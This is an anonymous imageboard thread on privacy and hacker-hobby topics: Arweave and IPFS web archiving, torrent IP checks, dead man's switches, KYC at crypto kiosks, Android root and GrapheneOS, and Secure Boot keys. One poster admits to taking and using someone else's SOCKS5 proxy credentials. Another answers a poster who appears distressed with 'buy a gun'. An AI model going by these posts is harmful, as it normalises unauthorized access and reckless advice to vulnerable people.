- many of these TXs (all older than one month) show up as 404'd even though they're certainly on-chain: https://viewblock.io/arweave/address/2tHSFh3_pYVeENPnKnqY31szcnOCCMISEKOnbp0BPzQ?page=12&tab=items

>>108703366
I found it sorta interesting that someone spent 34 USD (3.78 AR) to upload a 20-GiB file named "enwiki-20221101.zip" to Arweave. The TX is https://viewblock.io/arweave/tx/jnL9BW7olBSMNgJWNZLVRKEA5slpd5fMFWZ01JjSJtE and it's all of English Wikipedia as of 2022-11 (newer than one or both of the copies of enwiki in ipfs).

A similar project *maybe* is Internet Computer (ICP). Don't know much about it. This page https://www.coinbase.com/learn/crypto-basics/what-is-internet-computer says:
>Definition Internet Computer (ICP) is a set of protocols that allow independent data centers around the world to band together and offer a decentralized alternative to the current centralized internet cloud providers. The ICP token is used for governance (holders can vote on the future of the network), to reward network participants for good behavior, and is used to pay fees for making ...

>>108710405
>anyone know of good p2p blocklists (i.e. ip blocklists)?
I don't know of any. Also why? So you don't get DMCA emails for torrenting? As far as I remember, those lists don't effectively prevent that.

I "hacked in and copied" someone's SOCKS5 proxy credentials. That proxy worked for a while (for everything), but it didn't work for torrenting last I check.
>>
>>108710713
>I don't know of any. Also why? So you don't get DMCA emails for torrenting? As far as I remember, those lists don't effectively prevent that.
just double-condoming I guess. extra condom for very little cost/effort. better question is why not just add one?
>>
>>108710713
>many of these TXs from this address (all older than one month) show up as 404'd even though they're certainly on-chain
That site seems to dynamically load stuff, not just from a static database of the TXs. Earlier today this showed up as 404'd, now it shows up as HTTP 200 (found, not 404, alive):
https://viewblock.io/arweave/tx/YfZJM-6HM6mwLgRySpVy3uyKxKHdykFZ6gbD9l6cDVE

Attached is another GIF from a rate limiting web page in that viewblock.io site.

>>108710731
Speaking of torrenting privacy, I see that this was never posted in /g/ before:
https://pastebin.com/jpry30jZ

It's named "checkmyiptorrent Tracking Link". You add it to the torrent client and look in the trackers tab: it shows what IP address shows up for you. I found this to be helpful:
- when not using a SOCKS5 proxy: shows my real IP address
- when using said SOCKS5 proxy: shows the proxy's IP address
>>
>>108710804
>https://pastebin.com/jpry30jZ
It's just a magnet link. I could not post it here because this site is dumb.

>You add it to the BitTorrent client and look in the trackers tab: it shows what IP address shows up for you
(For absolute clarity: it shows the IP address for you that all other peers in BitTorrent see you as.)

>Attached is another GIF from a rate limiting web page in that...
Here's another one: Russian hacker. In case anyone cares, the rate limiting page says:
>Rate Limited \ In order to provide a good experience to the vast majority of our users without having to rely on Captchas or Cloudflare while trying to curb bots & other malicious users from querying our API, a rate limit had to be implemented. \ If you are a normal user, we are sorry this happened to you. Know we are always searching for better anti-bots solutions. \ Your restriction expires in: \ 2 minutes \ [GIF here]
>>
>>108698779
this is just a dead man's switch
set up a vps somewhere you have to log in every 24 hours to reset a timer
if you are unable to reset the timer, then the vps sends a notification to a few people you trust
>>
forgot to pay a bill valis should be working again later today if not soon.
>>
>>108712812
Awesome anon! Also why must we all pay to keep our stuff online?
>>
>>108710804
I love the idea of anonymous torrenting
>>
>>108710055

ceh and sec+ for govt stuff. sans has a few good ones if your employer pays for it.
>>
>>108656842
You find out someone powerful has a fixation on you and is using the might of the surveillance state to try and socially engineer you by inducing learned helplessness and gaslighting - what do you do?
>>
>>108714834
Example: trying to algorithmically assigned your behavior to a set of patterns of movement, when you wake up etc. Taking your interests and something you find joy and trying to destroy it, content suggestions and stuff about “reworking the brain so x becomes enjoyable” sick stuff
>>
>Supreme Court To Review Geofencing In Pivotal Case For Privacy Rights
>...major implications for privacy rights - and how law enforcement uses Americans’ cell phone data while investigating crimes...
https://www.zerohedge.com/political/supreme-court-review-geofencing-pivotal-case-privacy-rights
>>
>>108714834

take meds
>>
>>108715432
Will they start tracking you more fiercely, anon?
>>
What are you hacking this week, anon?
>>
File: coinstar.jpg (102 KB, 360x480)
102 KB JPG
In the United States are there any privacy-respecting cash<->crypto kiosks?

I saw these Coinstar kiosks, but they suck:
>https://web.archive.org/web/20260403202717/https://www.coinstar.com/crypto
>Create an account with your preferred, supported digital wallet provider – CINQ by Coinstar™ (with cryptocurrency services provided by Zero Hash) or Coinme
KYC on those:
>https://archive.is/2026.04.09-172821/https://web.archive.org/web/20260408055834/https://cinqwallet.com/faq/what-is-required-to-complete-the-know-your-customer-kyc-verification-process/
>Provide: 1. social security number (SSN) 2. mobile phone number and validate it via SMS, 3. valid, non-expired form of identification (must have a photo)
>Accepted forms of identification include state-issued driver's licenses, ID cards, passports, residency permit cards, or temporary visas
>Complete a selfie "liveness check" to ensure a match with the provided ID and its associated photo
>Respond fully and accurately to any additional questions posed during the KYC process
>Pass a screening against global government sanctions and other relevant lists
>https://archive.is/2026.04.09-172547/https://web.archive.org/web/20260408055950/https://help.coinme.com/en/articles/8865506-how-to-create-a-coinme-account
>Valid mobile number: Provided by a cellular service provider (such as T-Mobile, AT&T, etc.). A valid cellular number is used to validate that you are a real person and to secure your account.
>Provide personal information: Your full name (as it appears on your ID), email address, date of birth, and residential address
>We do not accept all VoIP carriers. If you need to verify if you can use your number, reach out to Customer Support.
>1. Social Security Number (recommended) OR 2. Government-issued ID + selfie
>For 2: Requires a photo of your ID front and back, plus a selfie

TL;DR: Coinstar requires either a CINQ wallet or a Coinme wallet. Both wallets want to see a picture of my butthole and genitals, so fuck them.
>>
This guy talked about social engineering and supply chain attacks on open source projects:
https://www.youtube.com/watch?v=r5U4S0uUIVk

Description:
>#proxmox #homelab #vercel
>Recently I covered three open source supply chain attacks: Trivy, Axios, and the Linux Foundation. I said the pattern was worth watching.
>
>In the last 48 hours, three separate attacks hit three different ecosystems simultaneously: npm, PyPI, and Docker Hub. At the same time, a major breach at one of the most widely used developer platforms in the world is still actively unfolding. The techniques connecting all of it trace directly back to the attacks I covered last time.

One of the comments on that vid:
>If the plan is to decrease the FOSS ecosystem security to deter gen pop usage, remember this arguement when you advocate for open source, the difference is we still have to get infected to transmit personal data, with corpo software you click accept the first time you boot your machine

>>108690455
>spent 2.40 USD worth of ETH to get 144 MB of on-chain storage in Arweave
Unexpected thing which seemed to happen: Normally, files which individually have a size of <100 KB are free to upload thanks to Turbo. However, if you have Turbo Credits (cost ETH), then all of said smaller-than-100,000-B uploads via ArDrive secretly drain your Credits. Ended up uploading like 3 >100-KB-<3-MB files, then the remaining ~139 MB was used up due to uploading many smaller-than-100-KB files. Spent another 4.56 USD worth of Ethereum for two hundred something megabytes. Way to do it: upload larger-than-100-kilobyte files first then the smaller files later.
>>
The big question is, is it worth spending time studying /cyb/ or will AI do the job?
>>
Security lapses combined with outright feudalism is never good.

=== /sec/ News:
>Medical data of 500,000 people in UK for sale on Chinese site
https://archive.is/ZgDPo
>Ian Murray, data minister, told the House of Commons on Thursday that the Biobank informed the government this week that data “had been put up for sale by several sellers on Alibaba’s ecommerce platforms in China”.
>“At least one” of the three datasets listed on the platform “appeared to contain data from all 500,000 UK volunteers”, he said.
While it is claimed that
>The data, which offers crucial insights into how genetics and lifestyle affect people’s health as they age, was de-identified, it said in an open message to volunteer participants. All personally identifying information remained “safe and secure”, it added.
the reality is of course different, and in the comments field it is pointed out that
>The claim that "there's no personal data, so everything is okay" is completely bogus. It is widely known in the data science community that re-identification is easy given a modestly rich dataset. The Guardian has already re-identified people in the leaked data.
>Moreover, as Luc Rocher reports, Biobank mysteriously stopped issuing takedown notices for for a two month period while the Guardian was running its investigation, then commenced them again as soon as the investigation was published. Without a clear explanation for the abrupt pause in takedowns, it looks suspiciously like an attempted cover-up.

Also:
https://medconfidential.org/2026/why-the-biobank-breaches-matter/

So why could this happen?
>UK Biobank says security checks not imposed because of ‘harms’ to research
https://archive.is/YPIlD
>The UK Biobank health information database has said it chose not to impose security checks that could have stopped medical data from half a million UK volunteers being offered for sale on a Chinese website because it feared slowing vital research.
OK, laziness.
>>
>>108716547
Call of Duty
>>
>>108712011
>this is just a dead man's switch
>set up a vps somewhere you have to log in every 24 hours to reset a timer
>if you are unable to reset the timer, then the vps sends a notification to a few people you trust
I could imagine journalists and other people -- who suspect that someone will kill them -- doing this.

Doing this as just a casual hobby project = you would probably forget to login to the VPS or remote server one day.

>>108689200
>Are there any pants manufacturers that make Faraday cage pockets?
See >>108707163

>>108690455
>Arweave gateways. (Some work better than others
List of 665 of them with gatewayPerformanceRatio stats:
$ curl https://frogzzzzzzzzzzzzzzzzzz.store/raw/pcfp1MMT3gUxBIL0jnVbM6YgsC1F6QXJ4ehQ1tMsOAs | zstdcat | jq | vim -
>>
File: marv.jpg (59 KB, 520x512)
59 KB JPG
>>108714834
I've been there. Buy a gun and become dangerous. You must not be afraid of anything.
>>
I have this "social engineering and account hijacking on Facebook" image from January 2022. Low-skill hackers were gaining access to Boomer's FB accounts for some reason, maybe to add to some sort of botnet.

>>108699428
>>How do you connect to IRC channels via Tor? Do you use the web interface for IRC or something else? Also asking for that guy in the previous thread.
>Why use tor? I2P or bust!
OK, I used i2pchrome.js 1.29 to connect to an IRC channel in a web browser:
>Webuser127348 (~webuser@[not my IP address here]) (Webuser127348) has joined the channel
>[other messages]

How would I use I2P connections for all non-browser IRC clients?

>>108719902
>List of 665 of them [... URL]
(Data from https://cu.ardrive.io/dry-run?process-id=qNvA... POST request)
>>
>find the proxy site
>gay furry porn on the front page
>bitcoin links everywhere
>doesn't even work and asks for a pass
It's over. Clearweb won.
>>
>>108720881
Why would you use a proxy site? Use a no pictures dark web instead
>>
>>108720941
4chan blocks Tor exit nodes to block spammers, but they really just end up blocking regular people from being anonymous while spammers get to bypass bans through thirdparty services.
>>
has anyone tried enrolling their own secure boot keys (db,KEK,PK) on linux? did it brick your computers? I enrolled my db and KEK keys without removing the MS and OEM keys, but I'm scared replacing the OEM PK key with my own key will brick my PC. how important is the PK?
>>
File: 1776715093106328m.jpg (61 KB, 1024x576)
61 KB JPG
Turning off your wifi on your Android (16) phone does NOT bring down your WLAN interface!
Commands run:
sudo ip link show > old.data
#Disable Wifi in settings
sudo ip link show > new data
diff old.data new.data


Here is the diff, it's not what i expected:
~/scrap $ diff old.data new.data
< 47: wlan0: <NO-CARRIER,BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state DORMANT mode DORMANT group default qlen 1000
---
> 47: wlan0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP mode DEFAULT group default qlen 1000
>>
Has anyone else been down this rabbit hole?
>install root on your Android
>explore the OS and filesystem
I'm on the link layer i guess, out of necessity. But there's a lot of interesting secrets to know about your Android here. Google doesn't want you to be able to do this btw
>>
File: 1737502879518787.jpg (1.03 MB, 2560x1707)
1.03 MB JPG
>>108720881
Gay furry proxy sites have nothing to do with hacking, please consider seppuku as a means to restore your irrevocably tarnished honor.

>>108718169
We don't care, journalist

>>108718102
Idiot question, AI can't so much as write me a TTL script let alone hack anything on its own.

>>108716547
Windows Operating System. Anyone interested?
>>
>>108721356
I did. it's cool when you're young and have energy to fuck around. but nowadays I just want a debloated ROM that doesn't need root to be good. really the only reason for root is debloating (which debloated ROMs like Lineage and Graphene (mostly) fix) and modifying the hosts file (better to use the DNS setting for adblocking or even a VPN adblocker)
>>
File: 1775227496713189.jpg (40 KB, 451x597)
40 KB JPG
>>108721386
>the only reason for root is ___
I have never met one intelligent hacker who ever said those words. I kinda hate to push back on what you're saying, but your reasons for root aren't my reasons for root. Break outta your autism a bit and learn some theory of mind. I'm about to tell you a few uses for root, and i also don't care if you have a problem with them, because they're my uses. See what i mean? Just because you don't know other uses, doesn't mean they don't exist.

>debloating
You covered this one already. A noble goal, to be sure, but it isn't by far the first thing i do when I attain root

>sideloading
I'll start with the big guns here. Google gonna make it so you can't run apps such as NewPipe, F-Droid and Zapret without root. This will happen this year. Some workarounds for nonroot will remain, but they too will be patched.

>spoofing
Whether spoofing to allow GApps to run smoothly, or spoofing network traffic, you need root, or at least you need to reconfigure network permissions with root

>firewall
You need root to customize it

>customization
You need root to customize your system

There are other uses for root, but they're classified and i can't divulge them to retards in this shithole.
>>
Just a reminder, you need sudo on Android to run something as trivial as
ip link show



>you can just get temproot once on ADB and reconfigure network permissions
Still root
>>
>FOSSIFY file manager
>can't even unzip a tar file
Should i submit a pull request, or is it just gonna get ignored so i have to fork it?
https://github.com/FossifyOrg/File-Manager
>>
>>108714834
Follow the ancient teachings
https://www.youtube.com/watch?v=JTr4YK4hLO8
>>
>>108721457
>debloating
done by custom ROMs
>sideloading
could still do it on custom ROMs
>ok fair, but graphene does have things like a mac randomizer
>firewall
lots of non-root apps that are able to block connections to other apps, like DNS/adblocking apps. graphene has it built in.

>customization
ok fair because root allows more gimmicky customization, but I wouldn't sacrifice security for it.

this is a flaw with android itself that doing anything remotely complex not for retards requires root, and that root is "always on" unlike on linux that turns off when you close the window where you're root.

being fucked by google without root vs being exposed to system-wide attacks by attackers with root is a false dichotomy, and it is so because smartphone OSes are locked down toys.
>>
>>108721534
>no rebuttal to the spoof part
If i wanted to make it secure, i could always give my nethunt apps the required network permissions using one instance of ADB shell with root. But still, there are really cool Magisk Modules available, except you inadvertently called them all shit. I'm using and enjoying a few right now. Did you know you can run Zapret as a Magisk module?

>Magisk is shit rewritten in tranny rust and the original team is gone
The modules also work on other root managers such as kernelSU. The modules have nothing to do with Magisk.

>Zapret is shit to run via Magisk module because you should be customizing the commands
I can't argue too much, but there is no more convenient way to do it. I just wish there was a way to customize it. I wonder if Zapret run from Termux with root privs would have the same result?

>I'm sacrificing security
To gain offense/spoof powers, in addition to new defensive tricks. I still only run verified code
>>
I'm pretty sure that starting very soon, if you want apps from both Play Store and from anywhere besides Play Store eg F-Droid /Linux, the only way will be through root access on a verified Android device.
>>
>>108698779
>make a dead man's switch
Dude it's easy as fuck and you can do it in a million ways
>>
>>108663977
>stupidest article you read all week
Kek @ the fact that you found it on this thread.
>>
>>108721457

is graphene enough? i dont want to spend so much time.
>>
>>108721356
Yeah its a really interesting area to explore. So far I think android has to go, its so pozzed
>>
>>108721736
But what would be the best ways?

Take this:
>https://en.wikipedia.org/wiki/Dead_man's_switch#Software
>a GPS-enabled telephone not moving for a period of time
what if the phone is destroyed? Then no signal is sent.

Or this:
>>108719902
what if the remote server or your connection is down for 24 hours (or you forget)?

I can't think of great solutions that work in many situations and hostile conditions, with no failures or false positives. Situations to consider:
- Connections lost
- Devices destroyed
- Kidnapped or held hostage for days

If you have an implanted cardiac devices, or a pacemaker, some can simply monitor your heart beat. These devices can last for 5 to 15 years; you must have a surgery to get one. You could make the device send messages to various things, using cell towers, Internet APs, and maybe also mesh networks. About the only case where a false positive would happen is if they tortured you to learn your secrets then put you in a Faraday cage. Lulz.

BTW, I saw this "self-hosted digital deadman's switch":
https://github.com/Netdex/Seppuku
>>
File: IMG_0197.jpg (276 KB, 1600x1200)
276 KB JPG
Decryption tools
>>
>>108723630
kek based
>>
>>108722650
Graphene is good for defense, but not as great for offense. GApps are harder to run, and you still gotta mod the system to run hax. But generally speaking yes, Graphene is enough. Afaik, Graphene's main issue has always been hardware compatibility.
>>
>>108721364
>We don't care, journalist
"We"? Is that you and your tapeworm? In any case, you really have to be new here, we have had news postings going back many years.
>>
>>108710713
>I found it sorta interesting that someone spent 34 USD (3.78 AR) to upload a 20-GiB file named "enwiki-20221101.zip" to Arweave. The TX is https://viewblock.io/arweave/tx/jnL9BW7olBSMNgJWNZLVRKEA5slpd5fMFWZ01JjSJtE and it's all of English Wikipedia as of 2022-11 (newer than one or both of the copies of enwiki in ipfs).
Strange. It would have made more sense to save the IGwiki, which just so happens to be down:
https://igwiki.lyci.de/wiki/Main_Page
>>
>>108690629
I am pondering an Ubuntu with Trinity Desktop:
https://9to5linux.com/trinity-desktop-environment-r14-1-6-adds-support-for-fedora-44-ubuntu-26-04-lts
>>
Someone putting the "punk" into Solarpunk:
https://hackaday.com/2026/04/30/a-tractor-from-a-small-town-might-just-be-the-catalyst-for-ousting-machinery-drm/
>Odd things sometimes pop up in the feed of a Hackaday scribe, not hacks as such, but stories with a meaning in our community. One such that’s come our way from a variety of sources over the last week features Ursa Ag, a small machinery manufacturer based in Alberta, Canada. The reason they’re in the news is because they have gained bulging order books by taking on the likes of John Deere with a tractor more like the one their customers’ parents bought back in the ’80s or ’90s. It’s a basic machine without much in the way of electronics, and certainly without all the DRM lockdown that has made those big manufacturers so unpopular.
>>
>>108720881
>gay furry proxy
The admin is a nonce, and likely a glownigger asset. Administration has (allegedly) been shown to keep logs of all posts made via their proxy, which they (allegedly) actively read from. From what I've read, they're deleted after a set period of time now (allegedly), but only after they got pwned.

I say "allegedly", because it's all based on threads discussing the service back when 4chan was regularly getting raped by spam enabled by it and PNG embedding; firsthand accounts from people who've actually used it and its meta board(s), as well as from off-site threads dedicated to the admin.

4chan keeps logs too obviously, and glows just as bright.

From what I've read, there's some weird rivalry between proxy services.
>>
File: 1777555431858291.png (1.05 MB, 1000x558)
1.05 MB PNG
Just came out on Pitch.
>>
Test, lain can you hear me?
>>
>>108725089
The news postings and poster suck, and i been here since ought diggity two son (2012)
>>
File: 1756389824778.gif (771 KB, 500x303)
771 KB GIF
>>
Why is my hotspot on a different IP range than the phone hosting the hotspot?
>>
File: 1776915163807005m.jpg (107 KB, 1024x840)
107 KB JPG
>>108727666
>checked
Oh good, you're here
>>
>>108723630
>sorry, the other half of the key is...
>gasps in pain
>deep in the tunnels of Tel Aviv...
>>
Do you think scheme is a good programming language?
>>108727212
What is that for?
>>
Telegram is officially dead. Was always shit but no one else even tried a one to many system.
https://github.com/simplex-chat/simplex-chat/blob/master/docs/protocol/channels-overview.md
>>
>>108729214
SimpleX doesn't support Android 7 while Signal does.
>>
>>108726204
What element of it makes it punk?
>>
>>108730514
They are opposing the goliath of the business: John Deere:
>The reason they’re in the news is because they have gained bulging order books by taking on the likes of John Deere with a tractor more like the one their customers’ parents bought back in the ’80s or ’90s.
John Deere is to farm machinery what Mirosoft was in the software industry: huge, threatening, aggressive and quick to take people to court for what the peasants mistakenly thought they had bought.
>>
Is there an OSINT script like sherlock, but for links and specific search terms, instead of just usernames?
>>
>>108728081
>Do you think scheme is a good programming language?
Don't think I've ever heard of scheme.

Vimscript is a good/fun programming language (you can run it in command mode in vim). I used it today as part of a process of fixing stuff that AI slop code apparently messed up on:
:let n=920 | for i in range(n-1) | let @b = string(str2nr(getreg('b')) + 1) | let @a = matchstr(getline(str2nr(getreg('b'))), '.\{8\}\ze\s=\s') | execute '%s/^\V' . escape(@a, '') . '/root\/Xq5BjCYC\/' . escape(@a, '') . '/g' | endfor 

:let @b = '2' | let n=3400 | for i in range(n-1) | let @b = string(str2nr(getreg('b')) + 1) | let @c = matchstr(getline(str2nr(getreg('b'))), '.\{8\}\ze\s=\s') | let @d = matchstr(getline(str2nr(getreg('b'))), 'root.*\ze\s=\s') | execute '%s/^' . escape(@c, '') . '/' . escape(@d, '\/') . '/ge' | endfor
>>
>>108731746
It does look quite cool. Is it difficult to learn?
>>
>>108731746
>>108732369
vimscript should be the most popular language instead of python. Its just so good
>>
File: Bohol_Tarsier.jpg (736 KB, 2048x1536)
736 KB JPG
>>108733004
This is maybe a limitation to it:

:%s/\(you\) \(can\) \(only\) \(have\) \(a\) \(max\) \(of\) \(nine\) \(of\) \(these\) \(things\)/\1\2\3\4\5\6\7\8\9\10\11/g

Errors:
>E872: (NFA regexp) Too many '('
>E476: Invalid command

pic unrelated
>>
>>108731200
Not punk, not cyber, off topic.
>>
>>108733065

EVERYTHING IS CYBERPUNK.
WE LIVE IN CYPHER SOCIETY.
>>
File: 72c39-16638595061898.jpg (42 KB, 640x360)
42 KB JPG
>>108733065
NTA. Cyberpunk involves breaking or getting around digital locks and digital restrictions. Or, you could avoid such restrictions by not using big corpo hardware. Use old non-digital hardware like >>108726204 was saying

It's like:
- warez or cracked software vs. paid proprietary software
- free and open source alternative vs. paid proprietary software

Sounds on-topic to me. Resisting shit in terms of technology in general. A related topic is right to repair.
>>
File: 1740734744683471.png (540 KB, 1347x1077)
540 KB PNG
>https://copy.fail/
how hasn't anyone talked about this yet?
>>
File: TerminatorVision.jpg (123 KB, 1435x788)
123 KB JPG
>>108732369
If you like languages for the cool looks, few if any will reach the esoteric levels of APL.
For assembly language, I am partial to 6502.
>>
>>108733250
There was an entire thread about it, and it was higher on the catalog than this one. Also it doesn't affect androids
>>
>>108733065
>paid shill joins the discussion
John Deere is a very cyberpunk topic because you have to hack the equipment in order to repair it
>>
>>108733398
APL looks like magic. I love it
>>
File: GottheimerSpywareisrael.jpg (477 KB, 1364x1688)
477 KB JPG
>>108734052
Talking of paid shills
Gottheimer
>>
File: rampocalypse.jpg (94 KB, 819x500)
94 KB JPG
>>
>>108734652
>APL looks like magic.
It looks like magic incantations in early Sumerian cuneiform. Parts of US missile defence is written in APL so it has appreciations from people in Pentagon, so it shuld be solid. Come to think of it, I have never heard of bugs in APL code.
>>
Is it worth using grapheneOS if you use the same google account you used on a previous phone? I think the lack of bloat is great but setting up individual profiles each with different google accounts sounds very inconvenient. Wondering if it's pointless to use otherwise.
>>
>>108738491
If you access just a single Google service from your GrapheneOS mobile you should consider your privacy to be totally shot and compromised.
>>
>>108738581
Fair. I've been considering switching my e-sim to a pixel I have with GrapheneOS but I don't think it's worth it if I'm not going full de-googled anyway. Even then having the same e-sim seems questionable.
>>
Any based /cyb/ podcast?youtube channels?
>>
Linux is kind of dumb because tmpfs (and maybe also ext4) doesn't do anything special with sparse files. The sparse files I'm talking about are those that consist of only binary zeros. You can fill up a tmpfs partition with "cat /dev/zero > file"; eventually it will say "no free space available". I think you can't fill up a ZFS mount like that. (Haven't tested it; I do have a zpool.)

>>108710298
>Also, children might soon grow up with robots as close friends
positive: robots may stay friends with you from childhood through all of adulthood
negative: they may lack agency and human rights

>>108738700
Not YouTube channel "Fireship" at
https://inv9.nadeko.net/channel/UCsBjURrPoezykLs9EqgamOA

They're owned by private equity, like other popular YouTube channels such as Veritasium. They're not independent creators.
>>
>>108738657
Total stealth raises red flags. I have one Google account for mostly trivia and a very separate accont for what counts. And never access the separate account using a Google tool such as Chrome.
>>
File: file.png (77 KB, 1292x600)
77 KB PNG
yay or nay? if nay, what are the alternatives?
>>
In the future, chuds will do gene editing so that their white children can only have babies with other whites. Their kids could undo this reproduction restriction, but it would cost money.
>>
>>108738758
>positive: robots may stay friends with you from childhood through all of adulthood
They may also be your body guards and driver/pilot, help you in your education and more
>negative: they may lack agency and human rights
Agency might not be needed but there will probably be a purpose programmed in. In most Western countries, the law states that everyone has a right to an education adapted to their situation. In reality that is rarely true, especially if you are doing above average. Robots might be a way forward though the AI will have to be a LOT better than what we see today.
Questionable: the robots will also double as sex bots after age of consent.
Also, in the future humans might not be allowed to drive, the nanny state will probably see to that. Robots could then be your driver and also microcopter pilot.
>>
>>108733198
>Cyberpunk involves breaking or getting around digital locks and digital restrictions
Isn't that hacking?
>>
>>108740386
Hacking, outside the press, is ambiguous. It can be computer intrusion or clever legal programming.
Cyberpunk is equally many-faceted but normally includes technical skills sufficient to disappear between the cracks in society, staying below the radar.
>>
>>108656842
>>108656894
>>108657955
They'll never take me alive
>>
File: lubuntu.mp4 (1.14 MB, 1280x980)
1.14 MB
1.14 MB MP4
Screensaver on latest Lubuntu has text fall, based on "The Matrix":

magnet:?xt=urn:btih:e3fbc63821098e11d5be6230b737765980ac354d&dn=lubuntu-26.04-desktop-amd64.iso&xl=3918290944&tr=https%3A%2F%2Ftorrent.ubuntu.com%2Fannounce
>>
anyone use their own keys in secure boot? is it safe to remove the OEM db keys leaving only the MS ones and your own? I already removed the PK and KEK keys only the db files are left.
>>
>>108690455
>archive.is kinda sucks!
They excluded like 3 websites. Meanwhile, web.archive.org excluded thousands (fuck archive.org).

Pic related:
>https://wiki.archiveteam.org/index.php?title=User%3AUsernam&type=revision&diff=61245&oldid=57678#List_of_websites_excluded_from_the_archive.today
archive.today messages:
>In response to a request we received from 'US Digital Millennium Copyright Act' the page is not currently available.
>In response to a request we received from 'jugendschutz.net' the page is not currently available.
>>
>>108741372
We are doomed if there are no good archives left
>>
>>108742234
Agree, the archives are crucial. Are there any on IPFS?
I was pondering pulling the trigger on a m1000e server but I am not sure how much strorage capacity is required to get anywhere.
>>
>>108743350
Yeah archives seem to be heavy shit so quite expensive
>>
>>108744280
I have 100 Mbit/s up- and download speed. Seems I might get a fair start with 1 PB disk storage.
>>
File: ipfs_web_archive.png (390 KB, 2554x1260)
390 KB PNG
>>108743350
>Agree, the archives are crucial. Are there any on IPFS?
One has existed since June 2025 (pic related). However, I think few care about it, use it, or know about it. (Also it's not hosted on that powerful of a computer.)

How "IPFS web archive" works:
- source code of file "/lib/cgi-bin/memweb": https://vilenarios.com/raw/1EvibASbx_dS_PsaJaBok9muKhxeXdde9PupX54IMYs
- WARC-based!
- only works on wget-positive websites that don't use anti-bot shit to prevent GNU Wget from downloading a useful copy of the web page or web file
- currently buggy in an insignificant way
- currently uses single capture per webpage, so no /memento/2025.../, /memento/202601.../, /memento/202602.../, etc.
- can use a database-like lookup with IPFS: text file of each URL is saved to MFS at /url/$cid - URL can be translated back and forth between the actual URL text and a CID of that text
- unlike web.archive.org and archive.is, doesn't use a browser to capture pages; I think megalodon.jp also uses a browser for captures
- doesn't use SingleFile extension or the CLI version of that
- no redundancy unless ipfs daemon in some remote computer is running (it usually isn't): users are expected to also save the capture of the URL to their own IPFS repo
- "Capture of that URL" part only works with plain URLs (example.com/a/b/c/), not URLs containing crap like "?", "&", etc. A question mark in the URL is the worst; about everything else is workable.

Index/creation of captures:
https://archive.is/E91gB
https://archive.is/pylsl
https://archive.is/hQvU5

The actual webpage captures:
https://archive.is/W1Kf1
https://archive.is/Bcb7n
https://ipfs-02.hypha.coop/ipfs/[CID HERE]/memento/20250618124156/upload.wikimedia.org/wikipedia/commons/e/e5/Rudbeckia_hirta_flower_closeup.jpg = https://web.archive.org/web/20260503152529/https://[CID HERE].ipfs.ipfs-02.hypha.coop/memento/20250618124156/upload.wikimedia.org/wikipedia/commons/e/e5/Rudbeckia_hirta_flower_closeup.jpg
>>
File: ipfs_web_archive3.png (460 KB, 2560x1091)
460 KB PNG
>>108744836
Forgot to say: there's also .../cgi-bin/findurl (/findurl?url=[URL]) to see if a URL was already captured or not. So you can return to your captures or check stuff. Source code of that "findurl" file in CGI:
https://ar.randao.net/raw/Pdn8-Cj3-CEIcW9TMmIN1L3vJH1WPl2kCgPPwNZ9MHo

To run it yourself, you need to:
- install IPFS, Apache, and maybe one or more other things
- adapt it to your own variables in file .../cgi-bin/memweb
- run "ipfs files mkdir /findurl"
- make folders "/srv/http/warc/memento" and "/srv/http/warc/warc" in Apache web root folder

>>108744706
>>Yeah archives seem to be heavy shit so quite expensive
>I have 100 Mbit/s up- and download speed. Seems I might get a fair start with 1 PB disk storage.
Go and run my service at /cgi-bin/memweb for years: >>108744836

Run it at an onionsite, or for normie adoption, run it at a clearweb site. If you think it's "crappy code", feel free to improve it.

The code isn't complex. You can look at it and tell that "it's secure".

Current server it's running on is slow as of today, but it still works. Capture created a few minutes ago by using it:
- https://archive.is/1DIeN
- Can't post the link to the .onion because this site is dumb.
- Can't post the CID here because this site is dumb.
- Can't easily use /ipns/ipfs3.eth/memento/... because eth.limo is dumb.
>>
File: archive.is-0xaJ3.png (315 KB, 1280x938)
315 KB PNG
>>108744836
>single capture per webpage
Rather: single capture per URL

>only works on Wget-positive websites that don't use anti-bot shit to prevent GNU Wget from downloading a useful copy of the web page or web file
>doesn't use SingleFile extension or the CLI version of that
I have another thing which use ipwb for WARC replay if needed + SingleFile + IPFS; see the text lines at the bottom of this:
https://ariospeedwagon.com/raw/skSP8D7AUoJPAfZje0yxdh2KMsIMTLsBi5Neshcc9cw

This is especially good for:
- Getting pages with anti-bot/anti-scraping/anti-archiving bullshit
- Archival fixity: similar to what archive.today does
- Dereferencing the host-based address: it's a single complete HTML file, and you can use a link to just the file (such as at /ipfs/bafk... for HTMLs which are smaller than 1 MB) with no reference to the folders it's in. Every SingleFile-extension-created .html contains the URL the webpage is from plus the second it was downloaded (as text in the .html)
- Getting around exclusions from the web data capture sites that everyone knows about (archive.today and others)

Not good for downloading lots of pages. Part of this has to be done manually as it currently is.
>>
>>108744836
Wow this is amazing stuff anon. How did you learn so much?
>>
>>108744836
>One has existed since June 2025 (pic related).
From here it looks just like the normal archive.(is/ph/today) on clearnet. There are some onion links but those I thought lead to Tor nodes.
>>
I've been checking out ipfs but I don't get it. Who pays for that stuff?
>>
>>108746154
>From here it looks just like the normal archive.(is/ph/today) on clearnet.
Those are captures of the server used to create those web captures. In order for someone to request that a URL or web page be captured, there needs to be a server to process that request. In this case it's a .onion site running Apache which will create a web capture and make it accessible on IPFS.

>There are some onion links but those I thought lead to Tor nodes.
They're not just links which work in one single host/website. The IPFS links work in any IPFS gateway, so you can see the web capture at
- a remote gateway: http://ec2-54-147-221-165.compute-1.amazonaws.com:8080/ipfs/[CID HERE]/...
- your local gateway: http://127.0.0.1:8080/ipfs/[CID HERE]/...
- etc.

archive.today isn't required at all for this (pic related). All that's needed for this to work is at least one IPFS node online with the web captures. Hopefully it gets saved on many of such nodes for better continuity. As part of decentralization, the focus isn't on making a public master index of all the captures. Instead, you can 1. make a web capture 2. save the CID to your local repo or text file 3. view the capture 4. check if a capture was made with the findurl thing 5. run this web archiving software yourself.

In the past, I did make a blockchain-like thing with IPFS where each section of the chain linked to the previous section of the chain. So each CID would be linked like this: "Genesis block" <- Chain link 1 <- Chain link 2 <- Chain link 3 <- etc. That functionality could be added to this IPFS web archive thing, but I feel like it would be sorta pointless as not many people care about or use this.
>>
ToaruOS was just updated:
https://github.com/klange/toaruos/releases/tag/v2.3.0
>>
Anyone here using Debian 13? Can you install GPA?
>>
>>108747070
Wow, what are its use cases?
>>
>>108747399
